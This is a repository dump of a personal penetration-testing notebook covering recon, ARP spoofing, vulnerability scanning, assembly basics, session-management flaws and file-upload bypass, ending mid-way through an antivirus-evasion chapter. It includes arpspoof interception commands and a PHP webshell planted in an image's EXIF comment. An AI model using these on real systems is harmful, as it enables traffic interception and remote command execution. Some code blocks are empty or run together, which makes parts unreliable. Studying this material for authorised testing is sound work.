├── .gitignore ├── README.md ├── SUMMARY.md ├── active_information_gathering.md ├── arp-spoofing.md ├── attacking_the_user.md ├── automated_vulnerability_scanners.md ├── bash-scripting.md ├── basics.md ├── basics_of_linux.md ├── basics_of_windows.md ├── binary_exploitation.md ├── binary_exploitation2.md ├── broken_authentication_or_session_management.md ├── browser_vulnerabilities.md ├── buffer_overflow_bof.md ├── bypass_image_upload.md ├── bypassing_antivirus.md ├── clean_up.md ├── clickjacking.md ├── cmd.md ├── commands.md ├── common_web-services.md ├── compiling-windows-exploits.md ├── connections.md ├── create_shellcode.md ├── creating_malicious_files.md ├── cross-site-scripting.md ├── cross_site_request_forgery.md ├── dGaQO6Y.png ├── database.md ├── default_layout_apache_on_different_versiont.md ├── dictionary_attacks.md ├── directory-traversal-attack.md ├── dns-spoofing.md ├── dns_basics.md ├── dns_zone_transfer_attack.md ├── dom-based-xss.md ├── editing-exploits.md ├── email_harvesting.md ├── escaping_restricted_shell.md ├── example_of_company_architecture.md ├── examplesXSS.md ├── exploit-examples_2.md ├── exploit_examples_and_tutorials.md ├── exploiting.md ├── exploits.md ├── exposed_version_control.md ├── failure-to-restrict-url-access.md ├── find_subdomains.md ├── finding_subdomains.md ├── firewalls.md ├── fss.jpg ├── function1-stackframe.png ├── function1.png ├── general_tips.md ├── generate_custom_wordlist.md ├── getting_meterpreter_shell.md ├── google_hacking.md ├── hashcat.md ├── host-header-attack.md ├── html-injection.md ├── identify_hash_and_crack_it.md ├── identifying-technology-stack.md ├── immunity_debugger.md ├── insecure-direct-object-reference-idor.md ├── java_applet.md ├── lead_to_compromise.md ├── linux.md ├── list_of_common_ports.md ├── littearature.md ├── local_file_inclusion.md ├── loot.md ├── loot_windows_-_for_credentials_and_other_stuff.md ├── main-stackframe.png ├── metasploit.md ├── meterpreter.md ├── modules.md ├── msfvenom---create-shellcode.md ├── netcat.md ├── network_traffic.md ├── networking.md ├── nosql-injections.md ├── online_password_cracking.md ├── oscp.md ├── pass_the_hash_-_reusing_hashes.md ├── passive_information_gatherig.md ├── password-cracking.md ├── payloads.md ├── persistence.md ├── physical_access_to_machine.md ├── pivoting.md ├── port_forwarding_and_tunneling.md ├── port_knocking.md ├── port_scanning.md ├── post_exploitation.md ├── powershell.md ├── powershell_scripting2.md ├── privilege-escalation-powershell.md ├── privilege_escalation_-_linux.md ├── privilege_escalation_windows.md ├── python_fundamentals.md ├── random-stuff.md ├── recon-ng.md ├── remote_file_inclusion.md ├── reverse-shell.md ├── scanning.md ├── scripting_with_python.md ├── server-side-vulnerabilities.md ├── session-fixation.md ├── setuid_c-code.md ├── smtp-user-enum.md ├── social_engineering_-_phishing.md ├── spawning_shells.md ├── sql-injections.md ├── ssl-strip.md ├── styles ├── ebook.css ├── print.css └── website.css ├── subdomain_takeover.md ├── tcp-dumps_on_pwnd_machines.md ├── text-injection.md ├── the_basics.md ├── tips.md ├── tools.md ├── tools_of_the_trade.md ├── transfering_files.md ├── transfering_files2.md ├── transfering_files_to_windows.md ├── users.md ├── vim.md ├── vulnerabilities.md ├── vulnerability_analysi.md ├── vulnerability_analysi1s.md ├── vulnerability_analysis.md ├── waf_-_web_application_firewall.md ├── web-scanning.md ├── web-services.md ├── webshell.md ├── wep.md ├── wget.md ├── wifi.md ├── windows.md ├── windows_exploitation.md ├── wireshark.md ├── wps.md ├── write_exploits.md └── xml_external_entity_attack.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Node rules: 2 | ## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files) 3 | .grunt 4 | 5 | ## Dependency directory 6 | ## Commenting this out is preferred by some people, see 7 | ## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git 8 | node_modules 9 | 10 | # Book build output 11 | _book 12 | 13 | # eBook build output 14 | *.epub 15 | *.mobi 16 | *.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IT-Security 2 | 3 | My notepad about stuff related to IT-security, and specifically penetration testing. Stuff I have come across that I don't feel like googeling again. 4 | 5 | I have used this book to try to write down how some things work, but at the same time I want to use it as a reference book to find commands and things I just can't remember. Therefore I have tried to create a TLDR section in the beginning of some chapters where I have copy-paste ready commands that are useful. And if you want to know more you can continue to read the rest of the chapter. This is my way of making the book a hybrid between the Red Team Field Manual and a standard introduction book to pentesting. 6 | 7 | Also, this book is just a collection of stuff that is available on the interwebz. I am just a simple collector. I have tried to include a reference section to show where I found the technique. This book is my way of trying to give something back to the infosec community and I hope it can be useful to someone. 8 | 9 | You can read this book on [https://pha5matis.gitbooks.io/netsec/content/](https://pha5matis.gitbooks.io/netsec/content/). If you feel like contributing, or just forking it, you can do that from its github repo here: [https://github.com/pha5matis/Pentesting-Guide](https://github.com/pha5matis/Pentesting-Guide). If you feel like this is a good start, but you want to add and remove things and just make it yours you can just fork it and do whatever you want with it. 10 | 11 | ## Find practical examples 12 | 13 | If you read about a vulnerability that you want to know more about I can really recommend searching for in on HackerOne via google. It is a good way to find real life examples of vulnerabilities. 14 | 15 | Here is an example of such a search: 16 | 17 | ``` 18 | site:hackerone.com sql-injection 19 | ``` 20 | 21 | ## Disclaimers 22 | 23 | Sometimes the line isn't very clear between the chapters. Some actions might be considered part of the vulnerability analysis-phase, but it could also but considered part of the recon-phase. It is what it is. 24 | 25 | Use at own risk. 26 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | * [Introduction](README.md) 4 | * [The Basics](the_basics.md) 5 | * [Linux](linux.md) 6 | * [Basics of Linux](basics_of_linux.md) 7 | * [Bash-scripting](bash-scripting.md) 8 | * [Vim](vim.md) 9 | * [Windows](windows.md) 10 | * [Basics of Windows](basics_of_windows.md) 11 | * [PowerShell](powershell.md) 12 | * [PowerShell Scripting](powershell_scripting2.md) 13 | * [CMD](cmd.md) 14 | * [Scripting With Python](scripting_with_python.md) 15 | * [Python Fundamentals](python_fundamentals.md) 16 | * [Useful Scripts](connections.md) 17 | * [Transferring Files](transfering_files2.md) 18 | * [Transfering Files on Linux](transfering_files.md) 19 | * [Transfering files on Windows](transfering_files_to_windows.md) 20 | * [Firewalls](firewalls.md) 21 | * [General tips and tricks](general_tips.md) 22 | * [Recon and Information Gathering Phase](scanning.md) 23 | * [Passive Information Gatherig](passive_information_gatherig.md) 24 | * Identify IP-addresses and Subdomains 25 | * Identify IP-addresses 26 | * [Find Subdomains](find_subdomains.md) 27 | * [DNS Basics](dns_basics.md) 28 | * [Finding subdomains](finding_subdomains.md) 29 | * [DNS Zone Transfer Attack](dns_zone_transfer_attack.md) 30 | * [Identifying People](email_harvesting.md) 31 | * [Search Engine Discovery](google_hacking.md) 32 | * [Identifying Technology Stack](identifying-technology-stack.md) 33 | * [Active Information Gathering](active_information_gathering.md) 34 | * [Port Scanning](port_scanning.md) 35 | * [Vulnerability analysis](vulnerability_analysi1s.md) 36 | * [Non-HTTP Vulnerabilities](server-side-vulnerabilities.md) 37 | * [Common ports\/services and how to use them](list_of_common_ports.md) 38 | * [Port Knocking](port_knocking.md) 39 | * [HTTP - Web Vulnerabilities](web-services.md) 40 | * [Common Web-services](common_web-services.md) 41 | * [WAF - Web Application Firewall](waf_-_web_application_firewall.md) 42 | * [Attacking the System](lead_to_compromise.md) 43 | * [Local File Inclusion](local_file_inclusion.md) 44 | * [Remote File Inclusion](remote_file_inclusion.md) 45 | * [Directory Traversal Attack](directory-traversal-attack.md) 46 | * [Hidden Files and Directories](web-scanning.md) 47 | * [SQL-Injections](sql-injections.md) 48 | * [Nosql-Injections](nosql-injections.md) 49 | * [XML External Entity Attack](xml_external_entity_attack.md) 50 | * [Bypass File Upload Filtering](bypass_image_upload.md) 51 | * [Exposed Version Control](exposed_version_control.md) 52 | * Directory Traversal Attack 53 | * [Host Header Attack](host-header-attack.md) 54 | * [Attacking the User](attacking_the_user.md) 55 | * [Clickjacking](clickjacking.md) 56 | * [Broken Authentication or Session Management](broken_authentication_or_session_management.md) 57 | * [Text/content-injection](text-injection.md) 58 | * [HTML-Injection](html-injection.md) 59 | * [Insecure Direct Object Reference \(IDOR\)](insecure-direct-object-reference-idor.md) 60 | * [Subdomain Takeover](subdomain_takeover.md) 61 | * [Cross Site Request Forgery](cross_site_request_forgery.md) 62 | * [Cross-Site Scripting](cross-site-scripting.md) 63 | * [Examples](examplesXSS.md) 64 | * [DOM-based XSS](dom-based-xss.md) 65 | * [Browser Vulnerabilities](browser_vulnerabilities.md) 66 | * HTML-Injection 67 | * [Session Fixation](session-fixation.md) 68 | * [Automated Vulnerability Scanners](automated_vulnerability_scanners.md) 69 | * [Exploiting](exploiting.md) 70 | * [Social Engineering - Phishing](social_engineering_-_phishing.md) 71 | * [Default Layout of Apache on Different Versions](default_layout_apache_on_different_versiont.md) 72 | * [Shells](reverse-shell.md) 73 | * [Webshell](webshell.md) 74 | * [Generate Shellcode](create_shellcode.md) 75 | * [Editing Exploits](editing-exploits.md) 76 | * [Compiling windows exploits](compiling-windows-exploits.md) 77 | * [Post Exploitation](post_exploitation.md) 78 | * [Spawning Shells](spawning_shells.md) 79 | * [Meterpreter for Post-Exploitation](getting_meterpreter_shell.md) 80 | * [Privilege Escalation - Linux](privilege_escalation_-_linux.md) 81 | * [Privilege Escalation - Windows](privilege_escalation_windows.md) 82 | * [Privilege Escalation - Powershell](privilege-escalation-powershell.md) 83 | * [Escaping Restricted Shell](escaping_restricted_shell.md) 84 | * [Bypassing antivirus](bypassing_antivirus.md) 85 | * [Loot and Enumerate](loot.md) 86 | * [Loot Windows](loot_windows_-_for_credentials_and_other_stuff.md) 87 | * [Loot Linux](tcp-dumps_on_pwnd_machines.md) 88 | * [Persistence](persistence.md) 89 | * [Cover your tracks](clean_up.md) 90 | * [Password Cracking](password-cracking.md) 91 | * [Generate Custom Wordlist](generate_custom_wordlist.md) 92 | * [Offline Password Cracking](identify_hash_and_crack_it.md) 93 | * [Online Password Cracking](online_password_cracking.md) 94 | * [Pass the Hash - Reusing Hashes](pass_the_hash_-_reusing_hashes.md) 95 | * [Pivoting - Port forwarding - Tunneling](port_forwarding_and_tunneling.md) 96 | * [Network traffic analysis](network_traffic.md) 97 | * [Arp-spoofing](arp-spoofing.md) 98 | * [SSL-strip](ssl-strip.md) 99 | * [DNS-spoofing](dns-spoofing.md) 100 | * [Wireshark](wireshark.md) 101 | * [Wifi](wifi.md) 102 | * [WEP](wep.md) 103 | * [WPS](wps.md) 104 | * [Physical access to machine](physical_access_to_machine.md) 105 | * [Literature](littearature.md) 106 | 107 | -------------------------------------------------------------------------------- /active_information_gathering.md: -------------------------------------------------------------------------------- 1 | # Active information gathering 2 | 3 | 4 | Once the passive phase is over it is time to move to the active phase. In this phase we start interacting with the target. 5 | 6 | 7 | 8 | ## Netdiscover 9 | 10 | This tool is used to scan a network for live machines. 11 | 12 | ``` 13 | netdiscover -r 192.168.1.1/24 14 | ``` 15 | 16 | ## Nikto 17 | 18 | Nikto is a good tool to scan webservers. It is very intrusive. 19 | 20 | ``` 21 | nikto -host 192.168.1.101 22 | ``` 23 | 24 | 25 | 26 | ## References 27 | 28 | https://blog.bugcrowd.com/discovering-subdomains 29 | 30 | https://high54security.blogspot.cl/2016/01/recon-ng-and-power-to-crawl-trough.html 31 | 32 | -------------------------------------------------------------------------------- /arp-spoofing.md: -------------------------------------------------------------------------------- 1 | # Arp-spoofing - Sniffing traffic 2 | 3 | 4 | 5 | 6 | ## Step 1 7 | 8 | Run nmap or netdiscover to list the devices on the network. 9 | `netdiscover -r 192.168.1.0/24` or whatever network range it is. This is good because it is live, and it updates as soon as new devices connect to the network. 10 | 11 | ``` 12 | nmap -vvv 192.168.1.0/24 13 | ``` 14 | 15 | ## Step 2 16 | 17 | ``` 18 | echo 1 > /proc/sys/net/ipv4/ip_forward 19 | ``` 20 | 21 | this command is fundamental. Without changing it to `1`you will only block the traffic, but not forward it. So that will bring down the connection for that person. Denial of service. If you want to do that make sure it is set to 0. If you want to intercept it make sure it is set to 1. 22 | 23 | ## Step 3 24 | 25 | ``` 26 | arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105 27 | ``` 28 | 29 | - `-i` is the interface flag. In this example we choose the wlan0 interface. Run `ifconfig` to see which interfaces you have available. 30 | - `-t` the target flag. It specifies your target. The first address is the router, and the second is the specific device you want to target. 31 | 32 | 33 | ## Step 4 - Read the traffic 34 | 35 | So now you are intercepting the traffic. You have a few choices how to read it. 36 | Use urlsnarf. 37 | 38 | ``` 39 | urlsnarf -i wlan0 40 | ``` 41 | 42 | it will output all URLs. 43 | 44 | ``` 45 | driftnet -i wlan0 46 | ``` 47 | 48 | Driftnet is pretty cool. It let's you see all the images that is loaded in the targets browser in real time. Not very useful, but kind of cool. 49 | - wireshark. Just open wireshark and select the interface and start capturing. 50 | - Tcpdump. Also awesome. 51 | -------------------------------------------------------------------------------- /attacking_the_user.md: -------------------------------------------------------------------------------- 1 | # Attacking the user 2 | 3 | In this section we focus on vectors that attack the user. These kinds of vulnerabilities seems to be popular with in bug bounties. -------------------------------------------------------------------------------- /automated_vulnerability_scanners.md: -------------------------------------------------------------------------------- 1 | # Automated Vulnerability Scanners 2 | 3 | Everyone on the interwebz that says they know something about pentesting will talk shit about nessus and say that it is for lazy pentesters, it creates too much noise, and that it produces too many false positives. That may be true, I don't know. But from a learning perspective it can be really great. It can help to show you what kind of vulnerabilities are out there. So whatever, do what you want. 4 | 5 | ## Server side scanning 6 | 7 | ### Nessus 8 | 9 | Register and download it here. 10 | http://www.tenable.com/products/nessus-home 11 | 12 | Then 13 | ``` 14 | dpkg -i nameOfFile 15 | ``` 16 | 17 | Start it 18 | ``` 19 | /etc/init.d/nessusd start 20 | ``` 21 | 22 | ### Nmap Scripting Engine 23 | 24 | 25 | Scripts are found on kali at: 26 | 27 | ``` 28 | /usr/share/nmap/scripts 29 | ``` 30 | 31 | ``` 32 | nmap --script-help default 33 | ``` 34 | 35 | Or for a specific script: 36 | 37 | ``` 38 | nmap --script-help nameOfScript 39 | ``` 40 | 41 | Run all default scripts together with a port-scan. These scripts could possibily crash certain servers. Causing a denial-of-service. So never run this on production servers. 42 | ``` 43 | nmap -sC 192.168.1.101 44 | ``` 45 | 46 | Nmap has categoriesed their scripts into several different categories to make it easier to run a few of them together 47 | 48 | ``` 49 | uth 50 | broadcast 51 | default 52 | discovery 53 | dos 54 | exploit 55 | external 56 | fuzzer 57 | intrusive 58 | malware 59 | safe, 60 | version 61 | vuln 62 | ``` 63 | 64 | So if you want to test all the vuln-scripts you do 65 | 66 | ``` 67 | nmap 192.168.1.10 -sC vuln 68 | ``` 69 | 70 | ### OpenVas 71 | 72 | OpenVas is another popular open-soruce vulnerability scanner. 73 | 74 | If you are on Kali linux you have to firt run the initial setup scripts, like this 75 | 76 | ``` 77 | openvas-setup 78 | ``` 79 | Make sure to write down the password that the initialisation-scripts gives you 80 | 81 | This will download some stuff and start setting everything up. WHen everything is set up you go to the web-interface: 82 | 83 | ``` 84 | https://127.0.0.1:9392/login/login.html 85 | ``` 86 | 87 | 88 | ### Metasploit Scanner Module 89 | 90 | 91 | ## Web Application Scanner 92 | 93 | ### Nikto 94 | 95 | ``` 96 | nikto -h example.com 97 | ``` 98 | 99 | ### Uniscan 100 | 101 | 102 | ``` 103 | uniscan -h 192.168.1.102 104 | ``` 105 | 106 | ### Metasploit - Wamp 107 | 108 | Found in metasploit 109 | 110 | ``` 111 | load wamp 112 | help 113 | ``` 114 | Read more here 115 | https://www.offensive-security.com/metasploit-unleashed/wmap-web-scanner/ -------------------------------------------------------------------------------- /bash-scripting.md: -------------------------------------------------------------------------------- 1 | # Bash-scripting 2 | 3 | ## Iterate over a file 4 | 5 | This script will iterate over a file and echo out every single line: 6 | 7 | ```bash 8 | #!/bin/bash 9 | 10 | for line in $(cat file.txt);do 11 | echo $line 12 | done 13 | ``` 14 | 15 | Another way of writing is this: 16 | 17 | ```bash 18 | #!/bin/bash 19 | 20 | while read p; do 21 | echo $p 22 | done 30 | 31 | int main(){ 32 | 33 | for (size_t i = 0; i < 10; i++) { 34 | puts("Hello world"); 35 | } 36 | 37 | return 0; 38 | } 39 | ``` 40 | 41 | So we have written a program in C and then compiled it. Now we want to look at the assembly code so see what code is actually going to be run by the machine. 42 | 43 | ``` 44 | objdump -D programName 45 | ``` 46 | 47 | This will give us som crazy output like this 48 | 49 | ```assembly 50 | 00000000004004e6
: 51 | 4004e6: 55 push %rbp 52 | 4004e7: 48 89 e5 mov %rsp,%rbp 53 | 4004ea: 48 83 ec 10 sub $0x10,%rsp 54 | 4004ee: 48 c7 45 f8 00 00 00 movq $0x0,-0x8(%rbp) 55 | 4004f5: 00 56 | 4004f6: eb 0f jmp 400507 57 | 4004f8: bf a4 05 40 00 mov $0x4005a4,%edi 58 | 4004fd: e8 be fe ff ff callq 4003c0 59 | 400502: 48 83 45 f8 01 addq $0x1,-0x8(%rbp) 60 | 400507: 48 83 7d f8 09 cmpq $0x9,-0x8(%rbp) 61 | 40050c: 76 ea jbe 4004f8 62 | 40050e: b8 00 00 00 00 mov $0x0,%eax 63 | 400513: c9 leaveq 64 | 400514: c3 retq 65 | 400515: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 66 | 40051c: 00 00 00 67 | 40051f: 90 nop 68 | ``` 69 | This is just the part about the main-function of the program. The output is a lot more, but that's not interesting to us at the time. 70 | 71 | `00000000004004e6` This number represents a place in memory. It is like an address. It could be written in base 10 if we wanted to. And it would still be the correct address. But out of the convenience describes about the address is written in hexadecimal. So the address is 16 digits. That is because the binary is a 64 bit addressing schema. So a 64-bit process can have 2^64 72 | (1.84467441 × 10^19) memory addresses. 73 | 74 | So on the first line after the main-line we see the number 55. All these numbers are actually machine-code, but instead of writing it in binary (01010101010101101) it is written in hexadecimal. The mnemonics to the right of those numbers are the instructions written in assembly. They are written so that we, humans, can understand it a bit easier. Instead of having to remember that 90 means nop. We just have to remember nop. So that's great. Makes it a lot easier to understand machine code. 75 | 76 | So instead of having to memorize `10010000` it is represented as `90` in hexadecimal. And instead of having to remember `90` in hexadecimal we just have to remember `nop`. Pretty great. But in the end they mean the same thing, they are just represented in three different ways. 77 | 78 | ### AT&T Syntaxt or Intel Syntax 79 | There are basically two types of assembly language representation, it is the: AT&T syntax and the Intel syntax. The AT&T syntax is the default syntax in linux distributions. So when we run objdump, like the example above, it is in AT&T syntax. And we can tell that it is AT&T because it has all those $ and % signs. If you add the `-M intel` to you objdump command you will see the output in Intel-syntax. But in the end, it doesn't really matter, tomato tomato. 80 | 81 | We can set the syntax in gdb with the following command: 82 | ``` 83 | set dis intel 84 | #or 85 | set disassembly-flavor intel 86 | ``` 87 | 88 | ### Registers 89 | 90 | Okay, so the processor in your computers has something called registers. Registers are like internal variables for your processor. They are predefined, in the sense that you can't create registers. They are already there. You can think of them as like micro-memories, or just variables. They are used by the processor to make stuff faster, instead of having to look up a specific place in the memory it has its own micro-memory. There are only 16 registers available on x86 processors. So it is not that much to remember. The names of the registers are a bit different between 64 bit processors and 32 bit. A 64bit processor can run 32 bit binaries, but 32 bit processors can't run 64 bit binaries. If you want to know what type a binary is you just type 91 | ``` 92 | file binaryName 93 | ``` 94 | 95 | These are the names for 32 bit registers. And they are divided into sub-groups. 96 | 97 | **General registers** 98 | These registers are mainly used for like temporary memory for the processor. 99 | 100 | EAX - Accumulator 101 | 102 | EBX - Base 103 | 104 | ECX - Counter 105 | 106 | EDX - Data 107 | 108 | 109 | **Index and pointers** 110 | ESI - Source index 111 | 112 | EDI - Destination index 113 | 114 | EBP - Base pointer - This one stores an address in its little micro-memory. 115 | 116 | EIP - Instruction pointer. Like a child points his finger on each word it reads in a book, the instruction pointer is that finger. It always points to the current instruction the processor is reading. This is a an important pointer. 117 | 118 | ESP - Stack pointer - This one also stores an address. 119 | 120 | 121 | **Segment registers** 122 | CS 123 | 124 | DS 125 | 126 | ES 127 | 128 | FS 129 | 130 | GS 131 | 132 | SS 133 | 134 | 135 | **Indicator** 136 | EFLAGS 137 | 138 | So let's take a look at them in a real program. Let's run the program above but this time with a debugger, the Gnu Debugger. 139 | 140 | ``` 141 | gdb -q ./myprogram 142 | ``` 143 | 144 | First we set a breakpoint with the command: `break main` to stop the program right before the main-function is run. Then we type `info registers` to see what we got with our registers. 145 | 146 | ``` 147 | Breakpoint 1, 0x00000000004004ea in main () 148 | (gdb) info registers 149 | #### General registers 150 | rax 0x4004e6 4195558 151 | rbx 0x0 0 152 | rcx 0x0 0 153 | rdx 0x7fffffffe798 140737488349080 154 | 155 | #### Index and pointers 156 | rsi 0x7fffffffe788 140737488349064 157 | rdi 0x1 1 158 | rbp 0x7fffffffe6a0 0x7fffffffe6a0 159 | rsp 0x7fffffffe6a0 0x7fffffffe6a0 160 | r8 0x400590 4195728 161 | r9 0x7ffff7dea6d0 140737351952080 162 | r10 0x83e 2110 163 | r11 0x7ffff7a57520 140737348203808 164 | r12 0x4003f0 4195312 165 | r13 0x7fffffffe780 140737488349056 166 | r14 0x0 0 167 | r15 0x0 0 168 | rip 0x4004ea 0x4004ea 169 | 170 | #### Indicator 171 | eflags 0x246 [ PF ZF IF ] 172 | 173 | #### Segment registers 174 | cs 0x33 51 175 | ss 0x2b 43 176 | ds 0x0 0 177 | es 0x0 0 178 | fs 0x0 0 179 | ``` 180 | 181 | So hexadecimal is used as a way to represent binary out of convenience. 182 | 183 | So assembly is written in the following form: 184 | ``` 185 | mnemonic destination,source 186 | ``` 187 | The mnemonics are instructions like: mov, push, sub 188 | The destination and source are registers, addresses in memories, or values. 189 | 190 | ### Mnemonics 191 | ```assembly 192 | mov rbp,rsp 193 | ``` 194 | 195 | So here we move the current value in rsp (stack pointer) to rbp (base pointer). This is pretty standard in the beginning of a program. We take the stack-pointer and say that it is equal to the base-pointer for now. 196 | 197 | ``` 198 | sub rsp,0x10 199 | ``` 200 | Here we read: Subtract 0x10 from rsp. So Stack-pointer register is now equal to what it was before minus 0x10. 201 | 202 | ``` 203 | add/inc ;add or increment 204 | ``` 205 | 206 | 207 | #### Flow control 208 | 209 | ``` 210 | cmp ; is used to compare values. 211 | jmp ; jump to a different part of the program. 212 | ``` 213 | 214 | For example 215 | ``` 216 | cmp QWORD PTR [rbp-0x8],0x9 217 | jbe 4004f8 218 | ``` 219 | Here we are making a comparison. Compare rbp-0x8 ==? 0x9. And **jbe** stands for jump if below or equal. I am guessing that is the loop. Then we have an address: **4004f8** which is the address to the point in the program where the loop is initiated. So it makes a comparison and if it is false it jumps to the beginning of the loop. 220 | 221 | 222 | 223 | ## Vulnerable functions 224 | ### access() 225 | Notes 226 | 227 | Warning: Using access() to check if a user is authorized to, for example, open a file before actually doing so using open(2) creates a security hole, because the user might exploit the short time interval between checking and opening the file to manipulate it. For this reason, the use of this system call should be avoided. (In the example just described, a safer alternative would be to temporarily switch the process's effective user ID to the real ID and then call open(2).) 228 | 229 | 230 | http://linux.die.net/man/2/access -------------------------------------------------------------------------------- /broken_authentication_or_session_management.md: -------------------------------------------------------------------------------- 1 | # Broken Authentication or Session Management 2 | 3 | 4 | 5 | ### Authentication 6 | 7 | 8 | 9 | ### Logout management 10 | 11 | * Log out in one tab but you stay logged in in another tab. 12 | 13 | * Click on log out and then go back in your browser, if you enter in the session again that is a problem. 14 | 15 | 16 | 17 | ### Session management 18 | 19 | ##### Session does not die after password reset 20 | 21 | https://hackerone.com/reports/145430 22 | 23 | ##### Cookie is usable after session is killed 24 | 25 | This might be an issue if you save the cookie, and then log out. And then inject the cookie into your request again. If you can enter the session you have an issue. The issue here might be that the cookie is cleared on the client-side but not on the server-side. 26 | 27 | ##### HttpOnly 28 | 29 | HttpOnly is a optional flag in the Set-Cookie response header. If the flag is set javascript code is not able to access the cookie. Which might prevent XSS. HttpOnly works if the browser honors that flag of course. But most browsers today do. You can see this behaviour if you open up the devetools in your browser and go to storage and look at the cookies. Then you can do 30 | 31 | `console.log(document.cookie)` and it will only print out the cookie that has the HttpOnly flag set to `false`. 32 | 33 | ##### SecureFlag 34 | 35 | This is another optional flag for cookies. It is the application server that set it. By setting this flag the browser will not send the cookie unencrypted. 36 | 37 | ##### Session-ID in URL 38 | 39 | Session ID:s should never be showed in URLs. The risk is that if you pass the session-id in the URL and then share the link with someone that person might inherit the session. But if you put the session-id in the cookie that risk is avoided. 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | ### Password reset link does not expire 48 | 49 | 1. You create an account in example.com. You add email a@email.com 50 | 2. Your email account gets hacked. 51 | 3. The hacker figures out you have a user on example.com. The hacker clicks the reset-password-link. But does not use it. 52 | 4. The hacked person figures out that he is hacked and thus goes to example.com to change his password. 53 | 5. The hacker now clicks on the link and manage to reset the password. 54 | 55 | The problem here is that the first reset-link should be blocked once the second is sent. 56 | 57 | #### Relevant bug bounty reports 58 | 59 | [https://hackerone.com/reports/23579](https://hackerone.com/reports/23579) 60 | [https://hackerone.com/reports/39203](https://hackerone.com/reports/39203) 61 | [https://hackerone.com/reports/23921](https://hackerone.com/reports/23921) 62 | 63 | ### Cookie does not expire 64 | 65 | An easy way to test this is by using burp-suite. 66 | 67 | 1. Open burp-suite 68 | 2. Login to a website you want to test 69 | 3. Intercept the request, anyone will do. 70 | 4. Right click on the request in burp-suite and click on "Send to repeater". Now you have saved that request for later. With the current cookie. 71 | 5. Log out from the website 72 | 6. Go to the Repeater-tab in burp and click on "Go". 73 | 7. Verify that you are redirected to the login. 74 | 75 | #### Relevant reports on hackerone 76 | 77 | [https://hackerone.com/reports/18503](https://hackerone.com/reports/18503) 78 | 79 | -------------------------------------------------------------------------------- /browser_vulnerabilities.md: -------------------------------------------------------------------------------- 1 | # Browser vulnerabilities 2 | 3 | We have mostly been looking at vulnerabilities found in sites that let's us either attack the user or the underlying system. But there is also another sort of vulnerability. When the browser itself is vulnerable and can lead to remote code execution. 4 | 5 | And example of this is ms12-036. 6 | 7 | 8 | ## XSS and redirection 9 | 10 | Most attacks against browsers is based on social engineering. The idea is that you trick the user to click on a link. That link, or that website, is usually controlled by the attacker in one way or another. It can be a legitimate site that the attacker is using, or it might be the attackers own server. 11 | 12 | Foe example, if the attacker is able to inject code html or javascript the attacker can redirect the user to load another page. 13 | 14 | 15 | One technique is to hide the redirection in a frame, this way the user won't even notice that an external page is being loaded. 16 | ``` 17 | 18 | ``` 19 | A less subtle technique is by just redirecting the user, with a script like this: 20 | ``` 21 | 22 | ``` -------------------------------------------------------------------------------- /buffer_overflow_bof.md: -------------------------------------------------------------------------------- 1 | # Buffer overflow (BOF) 2 | 3 | ##Methodology 4 | 5 | 1. Investigate the file 6 | ``` 7 | file 8 | strings 9 | ``` 10 | 11 | 2. Test it out - what does the program do? 12 | 13 | 3. Look at its functions in GDB 14 | 15 | ``` 16 | info functions 17 | ``` 18 | 19 | 4. Look at the assembly of a function 20 | 21 | ``` 22 | disass main 23 | disass otherfunction 24 | ``` 25 | 26 | 5. Look for the flow of the program. Look for cmp 27 | 28 | 6. Set up breakpoints with hooks 29 | 30 | ``` 31 | define hook-stop 32 | info registers ;show the registers 33 | x/24xw $esp ;show the stack 34 | x/2i $eip ;show the new two instructions 35 | end 36 | ``` 37 | 38 | 7. Step through the whole program. Or at the breakpoints 39 | 40 | ``` 41 | si ;steps one forward, but follows functions 42 | ni ;does not follow functions 43 | ``` -------------------------------------------------------------------------------- /bypass_image_upload.md: -------------------------------------------------------------------------------- 1 | # Bypass File Upload Filtering 2 | 3 | One common way to gain a shell is actually not really a vulnerability, but a feature! Often times it is possible to upload files to the webserver. This can be abused byt just uploading a reverse shell. The ability to upload shells are often hindered by filters that try to filter out files that could potentially be malicious. So that is what we have to bypass. 4 | 5 | ## Rename it 6 | 7 | We can rename our shell and upload it as shell.php.jpg. It passed the filter and the file is executed as php. 8 | 9 | **php** 10 | phtml, .php, .php3, .php4, .php5, and .inc 11 | 12 | **asp** 13 | asp, .aspx 14 | 15 | **perl** 16 | .pl, .pm, .cgi, .lib 17 | 18 | **jsp** 19 | .jsp, .jspx, .jsw, .jsv, and .jspf 20 | 21 | **Coldfusion** 22 | .cfm, .cfml, .cfc, .dbm 23 | 24 | ## GIF89a; 25 | If they check the content. 26 | Basically you just add the text "GIF89a;" before you shell-code. So it would look something like this: 27 | 28 | ``` 29 | GIF89a; 30 | 33 | ``` 34 | 35 | ## In image 36 | ``` 37 | exiftool -Comment='"; system($_GET['cmd']); ?>' lo.jpg 38 | ``` 39 | 40 | Exiftool is a great tool to view and manipulate exif-data. 41 | Then I had to rename the file 42 | 43 | mv lo.jpg lo.php.jpg 44 | 45 | ## Nullbyte 46 | 47 | 48 | ## References 49 | 50 | http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html 51 | 52 | https://www.owasp.org/index.php/Unrestricted_File_Upload 53 | http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Webshells%20In%20PHP,%20ASP,%20JSP,%20Perl,%20And%20ColdFusion.pdf -------------------------------------------------------------------------------- /bypassing_antivirus.md: -------------------------------------------------------------------------------- 1 | # Bypassing antivirus 2 | 3 | So first of all, what is a antivirus program and how does it work? 4 | 5 | ## How does it work? 6 | 7 | Antivirus normally uses blacklisting as their methodology. They have a huge database full of signatures for different known malware. Then the antivirus just scans the disk and search for any of those signatures. 8 | 9 | ## How do we bypass it? 10 | 11 | So since there are many different antivirus and they all have different databases of signatures it is important for us to know what antivirus our target uses. Once we know that we can use virtustotal.com to upload our malicious files to see if that specific antivirus finds it. 12 | 13 | So what we need to do is to change the malware enough so that the signature changes and the antivirus is not able to identify the file as malicious. 14 | 15 | There are a few different techniques for doing this. 16 | 17 | ### Encoding 18 | 19 | We can encode our malware in different ways. This can be done with msfvenom. Notice how we set the `-e` flag here, and then use 